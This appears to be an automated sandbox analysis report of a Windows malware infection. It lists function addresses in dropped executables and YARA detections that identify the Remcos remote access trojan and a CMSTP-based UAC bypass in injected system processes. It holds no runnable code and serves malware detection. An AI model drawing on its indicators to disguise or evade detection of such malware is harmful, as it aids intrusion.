Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A13C60	6_2_00007FF6A2A13C60
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A29DBCA4	6_2_00007FF6A29DBCA4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2ACFC90	6_2_00007FF6A2ACFC90
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A41C90	6_2_00007FF6A2A41C90
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A29EF9B8	6_2_00007FF6A29EF9B8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A29C1A10	6_2_00007FF6A29C1A10
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2AB994C	6_2_00007FF6A2AB994C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2AB7938	6_2_00007FF6A2AB7938
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A419AC	6_2_00007FF6A2A419AC
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A4F990	6_2_00007FF6A2A4F990
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A27AC8	6_2_00007FF6A2A27AC8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A8BB28	6_2_00007FF6A2A8BB28
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A79A58	6_2_00007FF6A2A79A58
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A11A60	6_2_00007FF6A2A11A60
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A3BA48	6_2_00007FF6A2A3BA48
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A29F3A40	6_2_00007FF6A29F3A40
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A29D7AB4	6_2_00007FF6A29D7AB4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A28018	6_2_00007FF6A2A28018
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A79FF8	6_2_00007FF6A2A79FF8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A29C1F80	6_2_00007FF6A29C1F80
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A2C0B8	6_2_00007FF6A2A2C0B8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A29F8080	6_2_00007FF6A29F8080
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A92084	6_2_00007FF6A2A92084
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A29D1DE8	6_2_00007FF6A29D1DE8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A51E2C	6_2_00007FF6A2A51E2C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A29F5DF7	6_2_00007FF6A29F5DF7
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A19D6C	6_2_00007FF6A2A19D6C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A21D70	6_2_00007FF6A2A21D70
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A77D70	6_2_00007FF6A2A77D70
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A5BDA0	6_2_00007FF6A2A5BDA0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2ACDD84	6_2_00007FF6A2ACDD84
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A49EE4	6_2_00007FF6A2A49EE4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A11ED0	6_2_00007FF6A2A11ED0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A55F04	6_2_00007FF6A2A55F04
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A4BE70	6_2_00007FF6A2A4BE70
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A4DEB0	6_2_00007FF6A2A4DEB0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A1DEA4	6_2_00007FF6A2A1DEA4
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Code function: 9_2_02AA20C4	9_2_02AA20C4
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF7823E37D8	10_2_00007FF7823E37D8
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF7823D3410	10_2_00007FF7823D3410
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF7823E7854	10_2_00007FF7823E7854
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF7823E5554	10_2_00007FF7823E5554
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF7823D8DF8	10_2_00007FF7823D8DF8
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF7823DAA54	10_2_00007FF7823DAA54
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF7823D5B70	10_2_00007FF7823D5B70
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF7823D3F90	10_2_00007FF7823D3F90
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF7823D372C	10_2_00007FF7823D372C
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF7823D9B50	10_2_00007FF7823D9B50
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF7823D6BE0	10_2_00007FF7823D6BE0
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF7823FAFBC	10_2_00007FF7823FAFBC
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF7823D1884	10_2_00007FF7823D1884
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF7823FAC4C	10_2_00007FF7823FAC4C
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF7823D2C48	10_2_00007FF7823D2C48
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF7823DB0D8	10_2_00007FF7823DB0D8
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF7823D8510	10_2_00007FF7823D8510
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF7823E18D4	10_2_00007FF7823E18D4
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF7823D7D30	10_2_00007FF7823D7D30
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF782401538	10_2_00007FF782401538
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF7823DCE10	10_2_00007FF7823DCE10
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF7823D81D4	10_2_00007FF7823D81D4
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF7823FD9D0	10_2_00007FF7823FD9D0
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF7823E0A6C	10_2_00007FF7823E0A6C
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF7823DE680	10_2_00007FF7823DE680
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF7823FEE88	10_2_00007FF7823FEE88
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF7823E4224	10_2_00007FF7823E4224
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF7823D2220	10_2_00007FF7823D2220
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF7823D4A30	10_2_00007FF7823D4A30
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF7823FAA30	10_2_00007FF7823FAA30
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF7823D5240	10_2_00007FF7823D5240
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF7823DD250	10_2_00007FF7823DD250
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF7823D9E50	10_2_00007FF7823D9E50
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF7823D7650	10_2_00007FF7823D7650
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF7823D6EE4	10_2_00007FF7823D6EE4
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF7823F7F00	10_2_00007FF7823F7F00
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF7823E37D8	11_2_00007FF7823E37D8
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF7823D3410	11_2_00007FF7823D3410
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF7823E7854	11_2_00007FF7823E7854
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF7823E5554	11_2_00007FF7823E5554
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF7823D8DF8	11_2_00007FF7823D8DF8
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF7823DAA54	11_2_00007FF7823DAA54
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF7823D5B70	11_2_00007FF7823D5B70
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF7823D3F90	11_2_00007FF7823D3F90
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF7823D372C	11_2_00007FF7823D372C
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF7823D9B50	11_2_00007FF7823D9B50
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF7823D6BE0	11_2_00007FF7823D6BE0
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF7823FAFBC	11_2_00007FF7823FAFBC
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF7823D1884	11_2_00007FF7823D1884
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF7823FAC4C	11_2_00007FF7823FAC4C
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF7823D2C48	11_2_00007FF7823D2C48
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF7823DB0D8	11_2_00007FF7823DB0D8
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF7823D8510	11_2_00007FF7823D8510
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF7823E18D4	11_2_00007FF7823E18D4
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF7823D7D30	11_2_00007FF7823D7D30
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF782401538	11_2_00007FF782401538
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF7823DCE10	11_2_00007FF7823DCE10
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF7823D81D4	11_2_00007FF7823D81D4
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF7823FD9D0	11_2_00007FF7823FD9D0
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF7823E0A6C	11_2_00007FF7823E0A6C
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF7823DE680	11_2_00007FF7823DE680
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF7823FEE88	11_2_00007FF7823FEE88
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF7823E4224	11_2_00007FF7823E4224
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF7823D2220	11_2_00007FF7823D2220
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF7823D4A30	11_2_00007FF7823D4A30
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF7823FAA30	11_2_00007FF7823FAA30
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF7823D5240	11_2_00007FF7823D5240
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF7823DD250	11_2_00007FF7823DD250
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF7823D9E50	11_2_00007FF7823D9E50
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF7823D7650	11_2_00007FF7823D7650
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF7823D6EE4	11_2_00007FF7823D6EE4
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF7823F7F00	11_2_00007FF7823F7F00
Source: C:\Users\Public\alpha.pif	Code function: 16_2_008574B1	16_2_008574B1
Source: C:\Users\Public\alpha.pif	Code function: 16_2_0085540A	16_2_0085540A
Source: C:\Users\Public\alpha.pif	Code function: 16_2_00854C10	16_2_00854C10
Source: C:\Users\Public\alpha.pif	Code function: 16_2_00864875	16_2_00864875
Source: C:\Users\Public\alpha.pif	Code function: 16_2_00874191	16_2_00874191
Source: C:\Users\Public\alpha.pif	Code function: 16_2_00859144	16_2_00859144
Source: C:\Users\Public\alpha.pif	Code function: 16_2_0087695A	16_2_0087695A
Source: C:\Users\Public\alpha.pif	Code function: 16_2_00865A86	16_2_00865A86
Source: C:\Users\Public\alpha.pif	Code function: 16_2_0087769E	16_2_0087769E
Source: C:\Users\Public\alpha.pif	Code function: 16_2_00863EB3	16_2_00863EB3
Source: C:\Users\Public\alpha.pif	Code function: 16_2_00864EC1	16_2_00864EC1
Source: C:\Users\Public\alpha.pif	Code function: 16_2_0085EE03	16_2_0085EE03
Source: C:\Users\Public\alpha.pif	Code function: 16_2_00857A34	16_2_00857A34
Source: C:\Users\Public\alpha.pif	Code function: 16_2_00856E57	16_2_00856E57
Source: C:\Users\Public\alpha.pif	Code function: 16_2_00873E66	16_2_00873E66
Source: C:\Users\Public\alpha.pif	Code function: 16_2_0085D660	16_2_0085D660
Source: C:\Users\Public\alpha.pif	Code function: 16_2_00860BF0	16_2_00860BF0
Source: C:\Users\Public\alpha.pif	Code function: 16_2_00856B20	16_2_00856B20
Source: C:\Users\Public\alpha.pif	Code function: 16_2_00860740	16_2_00860740
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 19_2_0043706A	19_2_0043706A
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 19_2_00414005	19_2_00414005
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 19_2_0043E11C	19_2_0043E11C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 19_2_004541D9	19_2_004541D9
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 19_2_004381E8	19_2_004381E8
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 19_2_0041F18B	19_2_0041F18B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 19_2_00446270	19_2_00446270
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 19_2_0043E34B	19_2_0043E34B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 19_2_004533AB	19_2_004533AB
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 19_2_0042742E	19_2_0042742E
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 19_2_00437566	19_2_00437566
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 19_2_0043E5A8	19_2_0043E5A8
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 19_2_004387F0	19_2_004387F0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 19_2_0043797E	19_2_0043797E
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 19_2_004339D7	19_2_004339D7
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 19_2_0044DA49	19_2_0044DA49
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 19_2_00427AD7	19_2_00427AD7
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 19_2_0041DBF3	19_2_0041DBF3
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 19_2_00427C40	19_2_00427C40
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 19_2_00437DB3	19_2_00437DB3
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 19_2_00435EEB	19_2_00435EEB
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 19_2_0043DEED	19_2_0043DEED
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 19_2_00426E9F	19_2_00426E9F
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 19_2_06F786B5	19_2_06F786B5
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 19_2_06F8E780	19_2_06F8E780
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 19_2_06F7470E	19_2_06F7470E
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 19_2_06F7829D	19_2_06F7829D
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 19_2_06F940E2	19_2_06F940E2
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 19_2_06F68165	19_2_06F68165
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 19_2_06F7EE53	19_2_06F7EE53
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 19_2_06F86FA7	19_2_06F86FA7
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 19_2_06F78F1F	19_2_06F78F1F
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 19_2_06F7EC24	19_2_06F7EC24
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 19_2_06F76C22	19_2_06F76C22
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 19_2_06F54D3C	19_2_06F54D3C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 19_2_06F78AEA	19_2_06F78AEA
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 19_2_06F6880E	19_2_06F6880E
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 19_2_06F68977	19_2_06F68977
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 19_2_06F5E92A	19_2_06F5E92A
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 19_2_06F79527	19_2_06F79527
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 19_2_06F7F2DF	19_2_06F7F2DF
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 19_2_06F7F082	19_2_06F7F082
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 19_2_06F5FEC2	19_2_06F5FEC2
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 19_2_06F77DA1	19_2_06F77DA1
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 19_2_06F67BD6	19_2_06F67BD6

Source: C:\Users\Public\alpha.exe	Code function: String function: 00007FF7823E3448 appears 72 times
Source: C:\Users\Public\alpha.exe	Code function: String function: 00007FF7823E081C appears 36 times
Source: C:\Users\Public\alpha.exe	Code function: String function: 00007FF7823E498C appears 40 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 06F75BA7 appears 54 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 00402093 appears 50 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 00434801 appears 41 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 06F42B9C appears 34 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 00401E65 appears 34 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 00434E70 appears 54 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 06F75538 appears 41 times
Source: C:\Users\Public\kn.exe	Code function: String function: 00007FF6A29CD1C8 appears 41 times
Source: C:\Users\Public\kn.exe	Code function: String function: 00007FF6A2AD64A6 appears 173 times
Source: C:\Users\Public\kn.exe	Code function: String function: 00007FF6A2A87BAC appears 34 times
Source: C:\Users\Public\kn.exe	Code function: String function: 00007FF6A29FBC9C appears 280 times
Source: C:\Users\Public\kn.exe	Code function: String function: 00007FF6A2A5EB98 appears 93 times
Source: C:\Users\Public\kn.exe	Code function: String function: 00007FF6A2A87D70 appears 35 times
Source: C:\Users\Public\kn.exe	Code function: String function: 00007FF6A2ACF1B8 appears 183 times
Source: C:\Users\Public\kn.exe	Code function: String function: 00007FF6A2ACF11C appears 37 times
Source: C:\Users\Public\kn.exe	Code function: String function: 00007FF6A2A80D10 appears 181 times
Source: C:\Users\Public\kn.exe	Code function: String function: 00007FF6A2A7ABFC appears 818 times
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Code function: String function: 02AA4500 appears 33 times
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Code function: String function: 02AA4860 appears 949 times
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Code function: String function: 02AA44DC appears 74 times
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Code function: String function: 02AB89D0 appears 45 times
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Code function: String function: 02AB894C appears 56 times
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Code function: String function: 02AA46D4 appears 244 times

Source: 30.2.SndVol.exe.4a70000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 30.2.SndVol.exe.4a70000.1.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 30.2.SndVol.exe.4a70000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 19.2.colorcpl.exe.6f40000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 19.2.colorcpl.exe.6f40000.2.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 19.2.colorcpl.exe.6f40000.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 30.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 30.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 30.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 30.2.SndVol.exe.4a71937.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 30.2.SndVol.exe.4a71937.2.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 30.2.SndVol.exe.4a71937.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 30.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 30.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 30.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 19.2.colorcpl.exe.6f40000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 19.2.colorcpl.exe.6f40000.2.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 19.2.colorcpl.exe.6f40000.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 19.2.colorcpl.exe.6f41937.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 19.2.colorcpl.exe.6f41937.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 19.2.colorcpl.exe.6f41937.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
